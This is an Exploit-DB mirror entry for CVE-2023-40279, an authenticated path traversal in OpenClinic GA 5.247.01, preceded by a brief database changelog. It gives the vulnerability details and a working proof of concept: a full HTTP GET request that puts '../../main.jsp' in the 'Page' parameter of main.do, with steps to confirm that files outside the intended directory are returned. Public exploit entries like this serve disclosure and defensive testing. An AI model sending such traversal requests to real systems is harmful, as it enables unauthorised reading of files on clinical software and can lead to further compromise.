exploit-db-mirror/exploits/php/webapps/51995.md
Exploit-DB 27ecd9e84b DB: 2024-04-16
5 changes to exploits/shellcodes/ghdb

Jenkins 2.441 - Local File Inclusion
OpenClinic GA 5.247.01 - Information Disclosure
OpenClinic GA 5.247.01 - Path Traversal (Authenticated)

djangorestframework-simplejwt 5.3.1 - Information Disclosure
2024-04-16 00:16:46 +00:00

1.6 KiB

Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)

Date: 2023-08-14

Exploit Author: V. B.

Vendor Homepage: https://sourceforge.net/projects/open-clinic/

Software Link: https://sourceforge.net/projects/open-clinic/

Version: OpenClinic GA 5.247.01

Tested on: Windows 10, Windows 11

CVE: CVE-2023-40279

Details

An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

Proof of Concept (POC)

Steps to Reproduce:

  • Crafting the Malicious GET Request:

  • Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.

  • Format the GET request as follows (in this example, ../../main.jsp is used to attempt directory traversal to access main.jsp):

GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1 Host: 192.168.100.5:10088 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Connection: close Cookie: JSESSIONID=[SESSION ID] Cache-Control: max-age=0

  1. Confirming the Vulnerability:
  • Send the crafted GET request to the target server.
  • If the server responds with the content of the requested file (e.g., main.jsp) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
  • This vulnerability can lead to sensitive information disclosure or more severe attacks.